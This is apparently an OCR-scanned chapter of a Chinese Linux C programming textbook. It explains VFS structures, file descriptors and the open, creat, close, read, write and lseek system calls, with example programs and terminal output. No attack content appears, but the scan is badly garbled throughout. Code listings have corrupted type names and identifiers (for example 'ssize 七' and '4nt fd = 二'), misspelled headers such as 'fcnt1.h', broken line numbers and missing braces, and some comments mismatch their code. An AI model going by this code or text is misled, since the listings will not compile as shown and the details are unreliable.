int (*write inode) (struct inode *, int); /* 写 节点 */ 


void (*drop_ inode) (struct inode *); /* 摘 取 节 点 */ 


jh 


超级 块 中 的 一 个 重要 元 素 是 超级 块 操作 函数 的 定义 。 这 个 结构 定义 一 组 用 来 管理 这 个 
文件 系统 中 的 节点 索引 inode 的 函数 。 例 如 ， 可 以 使 用 函数 alloc_inode() 来 分 配 inode， 用 
函数 destroy_inode() 删 除 inode。 可 以 用 read_inode0 和 write_inode() 读 写 inode, 用 sync_fsO 
执行 文件 系统 同步 。 可 以 在 Linux 的 源 代码 树 的 文件 Linux/include/Linux/fs.h 中 找到 
super_operations 结构 。Linux 文件 系统 中 所 支持 的 每 个 文件 系统 都 实现 一 套 自 己 的 inode 
操作 方法 ， 这 些 方法 实现 超级 块 所 定义 的 功能 并 向 VFS 层 提供 通用 的 抽象 。 


3. 文件 操作 


在 文件 fs.h 中 定义 了 文件 操作 的 结构 ,通常 实际 的 文件 系统 都 要 实现 对 应 的 操作 函数 ， 
例如 打开 文件 open、 关 闭 文件 close、 读 取 数 据 read 和 写 入 数据 write 等 。 


struct file operations { 
struct module *owner; 
loff 七 (*llseek) (struct file *, loff t, int); 
ssize 七 (*read) (struct file *, char _user *, size t, loff t *); 
ssize 七 (*write) (struct file *, const char user *, size 七 loff t *); 
ssize t (*aio read) (struct kiocb *, const struct iovec *, unsigned long, 


loff t); /* 异 步 读 */ 
ssize t (*aio write) (struct kiocb*, const struct iovec*, unsigned long, 
loff tt) /* 异 步 写 */ 


int (*readdir) (struct file *, void *, filldir t); /* 读 日 录 */ 
unsigned int (*poll) (struct file *, struct poll table struct *); 


/*poll 操作 */ 

int (*ioct1) (struct inode *, struct file*, unsigned int, unsigned Long) 
/*ioctl 函数 */ 

long (*unlocked ioct1) (struct file *, unsigned int, unsigned long); 
/* 非 锁定 ioct1*/ 

long (*compat ioctl1l) (struct file *, unsigned int, unsigned long); 
/* 简 装 ioct1*/ 

int (*mmap) (struct file *, struct vm area struct *);  /* 内 存 映 射 */ 


int (*open) (struct inode * struct file *); /* 打 开 #*/ 
int (*flush) (struct file *, fl owner t id); /* 写 入 #/ 
int (*release) (struct inode *# struct file *); /* 释 放 */ 
int (*fsync) (struct file *, struct dentry +*, int datasync); 
/* 同 步 */ 


int (*aio fsync) (struct kiocb *+，int datasync); 

int (*fasync) (int, struct file *, int); 

int (*lock) (struct file *, int, struct file lock *); /* 锁 定 */ 
ssize 七 (*sendpage) (struct file *; struct page +7 inty size 七 loff 七 
wn nt)y 

unsigned long (*get_ unmapped area) (struct file *#, unsigned long, 
unsigned long, unsigned long, unsigned long); 

int (*check flags) (int); 

int (*dir notify) (struct file *#filp, unsigned long arg); 

int (*flock) (struct file *, int, struct file lock *); 
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ssize t (*splice Write) (struct pipe inode info *，StFUct file *#, loff 七 
*, Size 七 unsigned int); 

ssize 七 (*splice read) (struct file *, loff t *, struct pipe inode info 
*; Size t, unsigned int); 

int (*setlease) (struct file *#*, long, struct file lock **); 


js 


ext4 文件 系统 实现 了 如 下 的 文件 操作 ， 当 打开 一 个 ext2 格式 的 文件 时 ， 系 统 调用 ext4 
文件 系统 注册 的 open() 函 数 ， 即 函数 generic_file_open()。 


const struct file operations ext4 file operations = { 


-llseek = generic file llseek, 
.read = do sync read, 
.write = do sync write, 
-aio_read = generic file aio read, 
.aio write = generic file aio write, 
.unlocked ioctl = ext4 ioctl, 
#ifdef CONFIG COMPAT 
Compat ioctl = ext4 compat ioctl, 
#endif 
.mmap = generic file mmap, 
.open = generic file open, 
.release = ext4 release file, 
.fsync = ext4 sync file, 


.Splice_read generic file splice read, 
.Splice write = generic file splice write, 


3.2 文件 的 通用 操作 方法 


本 节 将 介绍 文件 的 通用 操作 方法 。 先 介绍 如 何 建立 文件 、 打 开 文件 、 读 取 和 写 入 数据 ， 
最 后 介绍 了 一 些 常 用 的 文件 控制 函数 ， 包 括 stat0)、fetnl0 和 ioctl))。 本 节 中 的 例子 大 多 数 
指 的 是 磁盘 中 的 文件 操作 ， 但 是 其 操作 方法 并 不 限于 此 ， 对 设备 文件 同样 有 效 。 


3.2.1 文件 描述 符 


在 Linux 下 用 文件 描述 符 来 表示 设备 文件 和 普通 文件 。 文 件 描述 符 是 一 个 整 型 的 数据 ， 
所 有 对 文件 的 操作 都 通过 文件 描述 符 实现 。 

文件 描述 符 是 文件 系统 中 连接 用 户 空间 和 内 核 空间 的 枢纽 。 当 打开 一 个 或 者 创建 一 
个 文件 时 ， 内 核 空 间 创 建 相应 的 结构 ， 并 生成 一 个 整 型 的 变量 传递 给 用 户 空间 的 对 应 进 
程 。 进 程 用 这 个 文件 描述 符 来 对 文件 进行 操作 。 用 户 空间 的 文件 操作 ， 例 如 读 或 写 一 个 
文件 时 ， 将 文件 描述 符 作为 参数 传送 给 read 或 write。 读 写 函 数 的 系统 调用 到 达 内 核 时 ， 
内 核 解析 作为 文件 描述 符 的 整 型 变量 ， 找 出 对 应 的 设备 文件 运行 相应 的 函数 ， 并 返回 用 
户 空间 结果 。 

文件 描述 符 的 范围 是 0 一 OPEN_MAX， 因 此 是 一 个 有 限 的 资源 ， 在 使 用 完毕 后 要 及 
释放 ， 通 常 是 调用 close() 函 数 关闭 。 文 件 描述 符 的 值 仅 在 同一 个 进程 中 有 效 ， 即 不 同 进程 
的 文件 描述 符 ， 同 一 个 值 很 可 能 描述 的 不 是 同一 个 设备 或 者 普通 文件 。 

在 Linux 系统 中 有 3 个 已 经 分 配 的 文件 描述 符 ， 即 标准 输入 、 标 准 输出 和 标准 错误 ， 
它们 文件 描述 符 的 值 分 别 为 0、1 和 2。 读 者 可 以 查看 /dev/ 下 的 stdin 〈 标 准 输入 )、stdout 


Py 


三 
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〈 标 准 输出 ) 和 stderr〈 标 准 错误 )， 会 发 现 分 别 指向 了 /proc/selffd/ 目 录 下 的 0、1、2 文件。 
3.2.2 ”打开 创建 文件 open()、create() 函 数 


在 Linux 下 ，open() 函 数 用 于 打开 一 个 已 经 存在 的 文件 或 者 创建 一 个 新 文件 ，create0 
函数 用 于 创建 一 个 新 文件 。 

1. 函数 open()、create() 介 绍 

这 两 个 函数 的 原型 如 下 ， 根 据 用 户 设 置 的 标志 flags 和 模式 mode 在 路 径 pathname 下 
建立 或 者 打开 一 个 文件 。 


int open (Const char *pathname, int flags); 
int open (Const char *pathname, int flags, mode t mode); 


在 使 用 这 些 函数 的 时 候 ， 需 要 包含 头 文件 sys/types.h、sys/stat.h 和 fentl.h。 
open() 函 数 打开 pathname 指定 的 文件 ， 当 函数 成 功 时 ， 返 回 一 个 整 型 的 文件 描述 符 。 
这 个 函数 正常 情况 下 会 返回 一 个 文件 描述 符 的 值 ， 在 出 错 的 时 候 会 返回 -1。 
打开 文件 的 时 候 需 要 指定 打开 的 文件 路 径 ， 这 个 参数 由 pathname 指定 。 函 数 会 根据 这 
个 参数 的 值 在 路 径 中 查找 文件 并 试图 打开 或 者 建立 文件 。pathname 所 指 的 为 一 个 字符 串 变 
量 , 这 个 变量 的 长 度 在 不 同 的 系统 下 其 最 大 长 度 有 差别 , 通常 情况 下 为 1024 个 字 节 。 当 所 
给 的 路 径 长 度 大 于 这 个 数值 的 时 候 ， 系 统 会 对 字符 串 进行 截断 ， 仅 选择 最 前 面 的 字 节 进行 
操作 。 
文件 的 打开 标志 flags 用 于 设置 文件 打开 后 允许 的 操作 方式 ,可 以 为 只 读 、 只 写 或 读 写 。 
分 别 用 O_RDONLY (只 读 )、O_WRONLY (只 写 ) 和 O_RDWR ( 读 写 ) 表示 。 在 打开 文 
件 的 时 候 必 须 指定 上 述 的 三 种 模式 之 一 。 三 个 参数 中 O_ RDONLY 通常 定义 为 0， 
O_WRONLY 定义 为 1，O_RDWR 定义 为 2。 
参数 flags 除了 上 述 三 个 选项 之 外 ， 还 有 一 些 可 选 的 参数 。 
口 O_APPEND 选项 : 使 每 次 对 文件 进行 写 操作 都 追加 到 文件 的 尾 端 。 
口 O_CREAT: 如 果 文 件 不 存在 则 创建 它 ， 当 使 用 此 选择 项 时 ， 第 三 个 参数 mode 需 
要 同时 设 定 ， 用 来 说 明 新 文件 的 权限 。 
口 O_EXCL: 查看 文件 是 否 存在 。 如 果 同 时 指定 了 O_CREAT， 而 文件 已 经 存在 ， 会 
返回 错误 。 用 这 种 方法 可 以 安全 地 打开 一 个 文件 。 
口 O_ TRUNC: 将 文件 长 度 截 断 为 0。 如 果 此 文件 存在 ， 并 且 文 件 成 功 打 开 ， 则 会 将 
其 长 度 截 短 为 0。 例如: 


open (pathname,O_ RDWRO CREAT | O_TRUNC, mode); 


通常 使 用 O_TRUNC 选项 对 需要 清空 的 文件 进行 归 堆 操作。O_NONBLOCK 打开 文件 
为 非 阻 塞 方式 ， 如 果 不 指定 此 项 ， 默 认 的 打开 方式 为 阻塞 方式 ， 即 对 文件 的 读 写 操作 需要 
等 待 操作 的 返回 状态 。 其 中 ， 参 数 mode 用 于 表示 打开 文件 的 权限 ，mode 的 使 用 必须 结合 
flags 的 O_CREAT 使 用 ， 和 否则 是 无 效 的 。 它 们 的 值 在 表 3.2 中 列 出 ， 这 些 值 指定 用 户 操作 
文件 的 权限 。 
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表 3.2 mode 参数 的 值 和 含义 
选 项 值 含义 
S_IRWXU 00700 用 户 〈 文 件 所 有 者 ) 有 读 写 和 执行 的 权限 
S IRUSR 00400 户 对 文件 有 读 权限 
S_IWUSR 00200 用 户 对 文件 有 写 权 限 
S_IXUSR 00100 户 对 文件 有 执行 权限 
S IRWXG 00070 组 用 户 (文件 所 有 者 ) 有 读 写 和 执行 的 权限 
S_IRGRP 00040 组 用 户 对 文件 有 读 权限 
S_IWGRP 00020 组 用 户 对 文件 有 写 权 限 
S_IXGRP 00010 组 用 户 对 文件 有 执行 权限 
S IRWXO 00007 其 他 用 户 〈 文 件 所 有 者 ) 有 读 写 和 执行 的 权限 
S_IROTH 00004 其 他 用 户 对 文件 有 读 权 限 
S_IWOTH 00002 其 他 用 户 对 文件 有 写 权限 
S_IXOTH 00001 其 他 用 户 对 文件 有 执行 权限 
2. 使 用 函数 open() 的 例子 
这 个 例子 为 在 当前 目录 下 打开 一 个 文件 名 为 test.txt 的 文件 ,并 根据 文件 是 否 成 功 打开 


打印 输出 不 同 的 结果 。 程 序 的 代码 如 下 : 


01 /*ex03-open-01.c 打开 文件 的 例子 */ 
02 #include <sys/types.h> 

03 #include <sys/stat.h> 

04 #include <fcnt1.h> 

05 #include <stdio.h> 

06 int main(void) 

07 

08 int fd = -1; 

09 char filename[] = "test.tx 
10 fd = open (filename ,O_RDWR) 
1 if(-1 == fd){ 

下 

TS } else { 

14 

5 } 

16 return 0; 

hy /a 


/* 文 件 描述 符 声 明 */ 

/+ 打开 的 文件 名 */ 

/+ 打开 文件 为 可 读 写 方式 */ 
/+ 打开 失败 */ 


3 


’ 


printf ("Open file %s failure!, fd:%d\n",filename, fd); 


/* 打 开 成 功 */ 


printf ("Open file %s success,fd:%d\n",filename, fd); 


将 上 述 代码 保存 到 文件 ex03-open-01.c 中 ， 按 照 如 下 的 命令 进行 编译 : 


$gcc -o open-01 open-01.c 


运行 编译 出 来 的 可 执行 文件 open-01， 会 


$ ./open-01 


发 现 第 一 次 执行 失败 : 


Open file test.txt failure!, fd:-1 


因 
文件 : 


为 此 时 当前 目录 下 没有 文件 test.txt， 
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所 以 打开 文件 会 失败 。 建 立 一 个 空 的 test.txt 
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$echo "">test.txt 

再 次 运行 程序 : 

$ ./open-01 

Open file test.txt success,fd:3 

这 次 打开 文件 成 功 了 ， 返 回 的 文件 描述 符 的 值 为 3。 在 Linux 下 如 果 之 前 没有 其 他 文 
件 打开 ， 第 一 个 调用 打开 文件 成 功 的 程序 ， 返 回 的 描述 符 为 最 低 值 ， 即 3。 因 为 0、1、2 
文件 描述 符 分 配给 了 系统 ， 表 示 标 准 输 入 描述 符 0)、 标 准 输出 描述 符 1) 和 标准 错误 
(描述 符 2)。 在 Linux 下 可 以 直接 对 这 3 个 描述 符 进行 操作 例如 读 写 )， 而 不 用 打开 、 

open() 函 数 不 仅 可 以 打开 一 般 的 文件 , 而 且 可 以 打开 设备 文件 , 例如 open() 函 数 可 以 打 
开设 备 “/dev/sdal1”， 即 磁盘 的 第 一 个 分 区 ， 将 文件 open-01.c 中 打开 的 文件 名 修改 为 : 


char filename[] = "/dev/sdal"; 


保存 为 文件 名 open-02.c， 重 新 编译 后 运行 ， 结 果 为 : 


$gcc -o open-02 open-02.c 
# ./open-02 
Open file /dev/sdal success,fd:3 


O_CREAT 可 以 创建 文件 ， 与 O_EXCL 结合 使 用 可 以 编写 容错 的 程序 ， 例 如 将 
“open-01.c” 修 改 为 如 下 代码 : 


01 /* 文 件 open-03.c,0_CREAT 和 0O_EXCL 的 使 用 */ 
02 #include <sys/types.h> 

03 #include <sys/stat.h> 

04 #include <fcnt1.h> 

05 #include <stdio.h> 

06 int main(void) 


ot 

08 4nt fd = 二 

09 char filename[] = "test.txt"; /A* 打 开 文 件 , 如 果 文 件 不 存在 , 则 报错 */ 
10 fd = open (filename,O RDWRIO_CREAT|O EXCL,S_ IRWXU); 

1 if(-1 == fd){ /文件 已 经 存在 以 

2 printf ("File %s exist!,reopen it",filename); 

13 fd = open (filename ,O_RDWR); /* 重 新 打开 */ 

14 printf("Ed:Sd\nr td)s 

15 } else { /* 文 件 不 存在 ,创建 并 打开 */ 
16 printf ("Open file %s success,fd:%d\n",filename, fd); 
:Ey } 

18 return 0; 

J 


将 代码 保存 为 open-03.c， 编 译文 件 : 


$gcc -o open-03 open-03.c 


当 文件 test.txt 存在 时 运行 的 结果 为 : 


$./ open-03 
File test.txt exist!,reopen itfd:3 


删除 test.txt 后 再 次 运行 open-03， 结 果 为 : 
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Srm -f test.txt 
$./ open-03 
Open file test.txt success,fd:3 
前 目录 下 的 文件 ， 会 发 现 多 了 一 个 文件 大 小 为 0 的 文件 test.txt。 
创建 文件 的 函数 除了 可 以 在 打开 时 创建 外 ， 还 可 以 使 用 create() 函 数 创建 一 个 新 文件 ， 
其 函数 的 原型 如 下 : 
#include <sys/types.h> 
#include <sys/stat.h> 
#include <fcntl.h> 
int creat(const char *pathname, mode t mode); 
函数 creat 等 于 一 个 open 的 缩写 版 本 ， 等 效 于 如 下 方式 的 open。 
open (pathname, O_WRONLYO CREATO TRUNC, mode); 
creat 的 返回 值 与 open 一 样 ， 在 成 功 时 为 创建 文件 的 描述 符 。 
3.2.3 ”关闭 文件 close() 函 数 
close(O) 函 数 关 闭 一 个 打开 的 文件 ， 之 前 打开 文件 所 占用 的 资源 。 
1. close() 函 数 介 绍 


close() 函 数 的 原型 如 下 : 

#include <unistd.h> 

int close(int fd); 

close() 函 数 关 闭 一 个 文件 描述 符 ， 关 闭 以 后 此 文件 描述 符 不 再 指向 任何 文件 ， 从 而 描 
述 符 可 以 再 次 使 用 。 当 函数 执行 成 功 的 时 候 返 回 0， 如 果 有 错误 发 生 ， 例 如 文件 描述 符 非 
法 ， 返 回 -1。 在 使 用 这 个 函数 的 时 候 ， 通 常 不 检查 返回 值 。 

在 打开 文件 之 后 ， 必 须 关 闭 文件 。 如 果 一 个 进程 中 没有 正常 关闭 文件 ， 在 进程 退出 的 
时 候 系统 会 自动 关闭 打开 的 文件 。 但 是 打开 一 个 文件 的 时 候 ， 系 统 分 配 的 文件 描述 符 为 当 
前 进程 中 最 小 的 文件 描述 符 的 值 ， 这 个 值 一 般 情 况 下 是 递增 的 ， 而 每 个 进程 中 的 文件 描述 
符 的 数量 是 有 大 小 限制 的 。 如 果 一 个 进程 中 频繁 地 打开 文件 而 又 忘记 关闭 文件 ， 当 系统 的 
文件 描述 符 达到 最 大 限制 的 时 候 ， 就 会 因为 没有 文件 描述 符 可 以 分 配 造 成 打开 文件 失败 。 


2. close() 函 数 的 例子 


查看 当 


下 面 的 代码 月 


日 于 打开 当前 目录 下 的 test.txt 文件 ,每 次 打开 后 并 不 关闭 ,一 直到 系统 出 


现 错误 为 止 。 这 个 程序 用 于 测试 当前 系统 文件 描述 符 的 最 大 支持 数量 ， 代 码 如 下 : 


01 int main() 
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ne 0 /* 计 数 器 */ 
neta=0 /* 文 件 描述 符 */ 
for (i=0; fd>=0;i++) /* 循 环 打开 文件 直到 出 错 */ 
{ 
fd = open("test.txt",O RDONLY); /* 只 读 打开 文件 */ 
eal es oh /* 打 开 文 件 成 功 */ 
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09 printf ("fd:%d\n", fd); /* 打 印 文件 描述 符 */ 
10 } 

el elset /* 打 开 文 件 失败 */ 

证 获 printf ("error, can't open file\n"); /* 打 印 错 误 */ 
13 exit (0); /* 退 出 */ 

14 } 

15 } 

Eel 


要 测试 这 个 文件 需要 在 当前 目录 下 建立 一 个 test.txt 的 文件 , 可 以 使 用 “echo"">test.txt” 
来 建立 。 执 行程 序 后 的 文件 内 容 为 : 


E33 
fd:4 


fd:1022 

fd:1023 

error, can't open file 

系统 打开 第 一 个 文件 的 文件 描述 符 的 值 为 3, 一 直到 文件 描述 符 的 值 为 1023 都 可 以 正 
常 打 开 。 但 是 由 于 程序 中 一 直 没 有 关闭 文件 ， 到 文件 描述 符 为 1024 的 时 候 ， 由 于 超过 了 系 
统 的 可 分 配 最 大 值 ， 发 生 了 错误 。 读 者 可 以 修改 上 述 的 代码 ， 加 入 close() 函 数 调用 后 ， 会 
发 现 程 序 可 以 正常 地 运行 。 


3.2.4” 读 取 文 件 read() 函 数 
用 read() 函 数 从 打开 文件 中 读数 据 ， 用 户 可 以 对 读 入 的 数据 进行 操作 。 
1. read() 函 数 介绍 


使 用 这 个 函数 需要 将 头 文件 unistd.h 加 入 。read0) 函 数 从 文件 描述 符 fd 对 应 的 文件 中 读 
取 count 字 节 ， 放 到 buf 开始 的 缓冲 区 。 如 果 count 的 值 为 0，read() 函 数 返回 0， 不 进行 其 
他 操作 ;如 果 count 的 值 大 于 SSIZE_MAX， 结果 不 可 预料 。 在 读 取 成 功 的 时 候 ， 文件 对 应 
的 读 取 位 置 指针 ， 向 后 移动 位 置 ， 大 小 为 成 功 读 取 的 字 节 数 。 

read() 函 数 的 原型 定义 格式 如 下 。 


ssize t read(int fd, void *buf, size t count); 


如 果 read() 函 数 执行 成 功 ， 返 回 读 取 的 字 节 数 ， 当 返回 值 为 -1 的 时 候 ， 读 取 函 数 有 错 
误 发 生 。 如 果 已 经 到 达 文 件 的 末尾 ， 返 回 0。 返 回 值 的 数据 类 型 为 ssize_t 这 是 一 个 可 能 不 
同 于 int、long 类 型 的 数据 类 型 ， 它 是 一 个 符号 数 ， 具 体 实现 时 可 能 定义 为 long 或 者 int。 
read() 函 数 的 参数 fd 是 一 个 文件 描述 符 , 通常 是 open() 函 数 或 者 creat() 函 数 成 功 返回 的 
值 ， 参数 buf 是 一 个 指针 ， 它 指向 缓冲 区 地 址 的 开始 位 置 ， 读 入 的 数据 将 保存 在 这 个 缓冲 
区 中 ; 参数 count， 表 示 要 读 取 的 字 节 数量 ， 通 常用 这 个 变量 来 表示 缓冲 区 的 大 小 ， 因 此 
count 的 值 不 要 超过 缓冲 区 的 大 小 ， 否 则 很 容易 造成 缓冲 区 的 溢出 。 

在 使 用 read() 函 数 时 ，count 为 请 求 读 取 的 字 节 数量 ， 但 是 read() 函 数 不 一 定 能 够 读 取 
这 么 多 数据 ， 有 多 种 情况 可 使 实际 读 到 的 字 节 数 小 于 请 求 读 取 的 字 节 数 。 

口 读 取 普通 文件 时 ， 文 件 中 剩余 的 字 节 数 不 够 请 求 的 字 节 数 ， 例 如 在 文件 中 剩余 了 

10 个 字 节 ， 而 read() 函 数 请 求 读 取 80 个 字 节 ， 这 时 read() 函 数 会 将 剩余 的 10 个 字 


号 人 7 
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节 数 写 到 缓冲 区 buf 中 ， 并 返回 实际 读 到 的 字 节 数 10。 
口 当 从 中 断 设备 读 取 数 据 的 时 候 ， 其 默认 的 长 度 不 够 read() 函 数 请 求 读 取 的 数据 ， 例 
如 终端 缓冲 区 的 大 小 为 256 字 节 ， 而 read() 函 数 请 求 读 取 1024 个 字 节 。 
口 当 从 网 络 读 取 数 据 时 ， 缓 冲 区 大 小 可 能 小 于 读 取 请 求 的 数据 大 小 。 
因此 读 取 数 据 时 ， 要 判断 返回 实际 读 取 数 据 大 小 来 进行 处 理 。 


2. read() 函 数 的 例子 


下 面 的 代码 从 文本 文件 testtxt 中 读 取 数据 ， 文 件 中 存放 的 是 字符 串 quick brown fox 
jumps over the lazy dog。 读 取 成 功 后 将 数据 打印 出 来 。 


01 /* 文 件 read-01.c,0_CREAT 和 0O_EXCL 的 使 用 */ 
02 #include <sys/types.h> 

03 #include <sys/stat.h> 

04 #include <fcnt1.h> 

05 #include <unistd.h> 

06 #include <stdio.h> 

07 int main(void) 


08 +t 

09 int fd = -1,i; 

10 ssize t size = -1; 

1 char buf[10]; /* 存 放 数据 的 缓冲 区 */ 

eg char filename[] = "test.txt"; 

下 

14 fd = open (filename,O_RDONLY); /* 打 开 文件 , 如 果 文 件 不 存在 , 则 报错 */ 
15 if(-1 == fd){ /* 文 件 已 经 存在 */ 

16 printf ("Open file ss failure,fd:%d\n",filename, fd); 

了 }else { /* 文 件 不 存在 ,创建 并 打开 */ 
18 printf ("Open file %s success,fd:%d\n",filename, fd); 

19 } 

20 /* 循 环 读 取 数据 , 直到 文件 末尾 或 者 出 错 * / 

21 while(size){ 

22 size = read(fd, buf,10); /* 每 次 读 取 10 个 字 节 数据 */ 
23 if( -1 == size) { /* 读 取 数 据 出 错 */ 

24 

5 close (fd); /* 关 闭 文件 */ 

26 printf ("read file error occurs\n"); 

27 

28 return -1; /* 返 回 */ 

29 }elset /* 读 取 数 据 成 功 */ 

30 if(size >0 ){ 

3 printf("read $d bytes:",size); /* 获 得 size 个 字 节 数据 */ 
32 peinEE( Nu /* 打 印 引 号 */ 

33 for(i = 0;i<size;i++){ /* 将 读 取 的 数据 打印 出 来 */ 
34 printf ("gc",* (buf+i)); 

区 全] } 

36 

3 Printfl(m Nn Na /* 打 印 引号 并 换行 */ 

38 }elset 

39 Printf("reach the end of file\n"); 

40 } 

41 下 

42 } 

43 return 0; 

44 } 
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将 上 述 代 码 保存 到 文件 read-01.c 中 ， 编 译文 件 ， 并 运行 成 功 编译 后 生成 的 可 执行 文件 
read。 


S$gcc -o read-01 read-01.c 


$./read-01 

Open file test.txt success,fd:3 (打开 文件 成 功 , 文件 描述 符 为 3) 

read 10 bytes:"quick brow" ( 读 取 了 10 个 字 节 数据 : "quick brow") 
read 10 bytes:"n fox jump" ( 读 取 了 10 个 字 节 数据 : "n fox jump") 
read 10 bytes:"s over the" ( 读 取 了 10 个 字 节 数据 : "s over the") 
read 9 bytes:" lazy dog" ( 读 取 了 9 个 字 节 数 : " lazy dog") 
reach the end of file (到 达 文 件 末 尾 ) 


3.2.5” 写 文件 write() 函 数 
write() 函 数 向 打开 的 文件 中 写 入 数据 ， 将 用 户 的 数据 保存 到 文件 中 。 
1. write() 函 数 介绍 


与 read() 函 数 的 含义 相似 ，write() 函 数 向 文件 描述 符 和 写 入 数据 ， 数 据 的 大 小 由 count 
指定 ，buf 为 要 写 入 数据 的 指针 ，write(O) 函 数 返回 值 为 成 功 写 入 数据 的 字 节 数 。 当 操作 的 对 
是 普通 文件 时 ， 写 文件 的 位 置 从 文件 的 当前 开始 ， 操 作成 功 后 ， 写 的 位 置 会 增加 写 入 字 
节 数 的 值 。 如 果 在 打开 文件 的 时 候 指 定 了 O_APPEND 项 ， 每 次 写 操作 之 前 ， 会 将 写 操作 
的 位 置 移 到 文件 的 结尾 处 。write() 函 数 的 原型 如 下 。 


#include <unistd.h> 
ssize t writel(int fd, const void *buf, size t count); 


函数 操作 成 功 会 返回 写 入 的 字 节 数 ， 当 出 错 的 时 候 返 回 -1。 出 错 的 原因 有 多 种 ， 像 磁 
盘 已 满 ， 或 者 文件 大 小 超出 系统 的 设置 ， 例 如 ext2 下 的 文件 大 小 限制 为 2Gbytes 等 。 
写 操作 的 返回 值 与 想 写 入 的 字 节 数 会 存在 差异 ， 与 read() 函 数 的 原因 类 似 。 


夕 注 意 : 写 操作 函数 并 不 能 保证 将 数据 成 功 地 写 入 磁盘 , 这 在 异步 操作 中 经 常 出 现 , write() 
函数 通常 将 数据 写 入 缓冲 区 ， 在 合适 的 时 机 由 系统 写 入 实际 的 设备 。 可 以 调用 
fsync() 通 数 ， 显 示 将 输入 写 入 设备 。 


2. write() 函 数 的 例子 


假设 在 磁盘 上 存在 一 个 大 小 为 50 字 节 的 文件 testtxt, 向 其 中 写 入 数据 quick brown fox 
jumps overthe lazy dog， 在 写 入 前 后 的 文件 大 小 不 变 ， 只 是 文件 开始 部 分 的 内 容 改 变 了 。 


01 /* 文 件 write-01.c,write() 函数 的 使 用 */ 
02 #include <sys/types.h> 

03 #include <sys/stat.h> 

04 #include <unistd.h> 

05 #include <string.h> 

06 #include <fcnt1.h> 

07 #include <stdio.h> 

08 int main(void) 

09 1 

10 int fd = -1; 
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11 ssize t size = -1 
下 之 
3 char buf[]="quick brown fox jumps over the lazy dog"; 
/* 存 放 数 据 的 缓冲 区 */ 
14 char filename[] = "test.txt"; 
15 
16 fd = open (filename,O_ RDWR); /* 打 开 文 件 , 如 果 文件 不 存在 , 则 报错 */ 
i if(-1 == fd){ VX 诡 件 已 经 存在 3 
18 printf ("Open file %s failure,fd:%d\n",filename, fd); 
19 } else { /* 文 件 不 存在 ,创建 并 打开 */ 
20 printf ("Open file %s success,fd:%d\n",filename, fd); 
21 } 
22 
23 size = write(fd，buf,strlen (buf) ) ; /* 将 数据 写 入 到 文件 test.txt 中 */ 
24 printf ("write %d bytes to file %s\n",size,filename); 
2 
26 close (fd) ; /* 关 闭 文件 */ 
27 return 0; 
28 } 


将 此 代码 存 入 write-01.c 后 编译 ， 运 行 代码 并 查看 文件 大 小 ， 会 发 现 文件 test.txt 的 大 
小 没有 改变 但 文件 的 内 容 发 生 了 变化 : 
$ ls -1 test.txt 
-rw-rw-r-- 1 linux-c linux-c 51 5 月 31 15:11 test.txt 
$ cat test.txt 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
$gcc -o write write-01.c 
$ ./write-01 
Open file test.txt success,fd:3 
write 39 bytes to file test.txt 
$ ls = 上 test.txt 
=rW-rWw-r-- 1 linux-c linux-c 51 5 月 31 15:12 test.txt 
$ cat test.txt 
quick brown fox jumps over the lazy dogaaaaaaaaaaa 
写 入 的 39 个 字符 仅仅 覆盖 了 文件 test.txt 开头 的 部 分 。 要 在 写 入 的 时 候 对 文件 进行 清 
可 以 使 用 open() 函 数 的 O_TRUNC 选项 ， 将 打开 的 函数 修改 为 如 下 形式 : 


fd = open(filename,O RDWR|IO_TRUNC); 
编译 后 再 次 运行 会 发 现 这 次 写 入 后 文件 的 大 小 变 为 39 了 。 
3.2.6 文件 偏 移 lseek() 函 数 


在 调用 read0 和 write() 函 数 时 ， 每 次 操作 成 功 后 ， 文 件 当前 的 操作 位 置 都 会 移动 。 其 
中 隐 含 了 一 个 概念 ， 即 文件 的 偏 移 量 。 文 件 的 偏 移 量 指 的 是 当前 文件 操作 位 置 相对 于 文件 
开始 位 置 的 偏 移 。 

每 次 打开 和 对 文件 进行 读 写 操作 后 , 文件 的 偏 移 量 都 进行 了 更 新 。 当 写 入 数据 成 功 时 ， 
文件 的 偏 移 量 要 向 后 移动 写 入 数据 的 大 小 。 当 从 文件 中 读 出 数据 的 时 候 ， 文 件 的 偏 移 量 要 
向 后 移动 读 出 数据 的 大 小 。 

文件 的 偏 移 量 是 一 个 非 负 整数 , 表示 从 文件 的 开始 到 当前 位 置 的 字 节 数 。 一 般 情况 下 ， 
对 文件 的 读 写 操作 都 从 当前 的 文件 位 移 量 处 开始 ， 并 增加 读 写 操作 成 功 的 字 节 数 。 当 打开 


由 
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一 个 文件 时 ,如果 没 有 指定 O_APPEND 选择 项 , 文件 的 位 移 量 为 0。 如 果 指 定 了 O_APPEND 
选项 ， 文 件 的 偏 移 量 与 文件 的 长 度 相 等 ， 即 文件 的 当前 操作 位 置 移 到 了 末尾 。 


1. lseek() 函 数 介 绍 
lseek() 函 数 可 以 设置 文件 偏 移 量 的 位 置 ，lseek() 的 函数 原型 如 下 : 


#include <sys/types.h> 

#include <unistd.h> 

off t lseek(int fildes, off t offset, int whence); 

这 个 函数 对 文件 描述 符 fildes 所 代表 的 文件 ， 按 照 操 作 模 式 whence 和 偏 移 的 大 小 
offset， 重 新 设 定 文件 的 偏 移 量 。 

如 果 lseek() 函 数 操作 成 功 ， 就 返回 新 的 文件 偏 移 量 的 值 ， 如 果 失 败 ， 则 返回 -1。 由 于 
文件 的 偏 移 量 可 以 为 负 值 ， 判 断 lseek() 是 否 操作 成 功 时 ， 不 要 使 用 小 于 0 的 判断 ， 要 使 用 
是 否 等 于 -1 来 判断 函数 失败 。 

参数 whence 和 offset 结合 使 用 。whence 表示 操作 的 模式 ，offset 是 偏 移 的 值 ，offset 
的 值 可 以 为 负 值 。offset 值 的 含义 如 下 : 

口 如 果 whence 为 SEEK_ SET， 则 offset 为 相对 文件 开始 处 的 值 ， 即 将 该 文件 偏 移 量 

设 为 距 文件 开始 处 offset 个 字 节 。 

口 如 果 whence 为 SEEK_ CUR， 则 offset 为 相对 当前 位 置 的 值 ， 即 将 该 文件 的 偏 移 量 

设置 为 其 当前 值 加 offset。 

口 如 果 whence 为 SEEK_ END， 则 offset 为 相对 文件 结尾 的 值 ， 即 将 该 文件 的 偏 移 量 

设置 为 文件 长 度 加 offset。 

函数 lseek 执行 成 功 时 返回 文件 的 偏 移 量 ， 可 以 用 SEEK_CUR 模式 下 偏 移 0 的 方式 获 
得 当前 的 偏 移 量 ， 例 如 : 


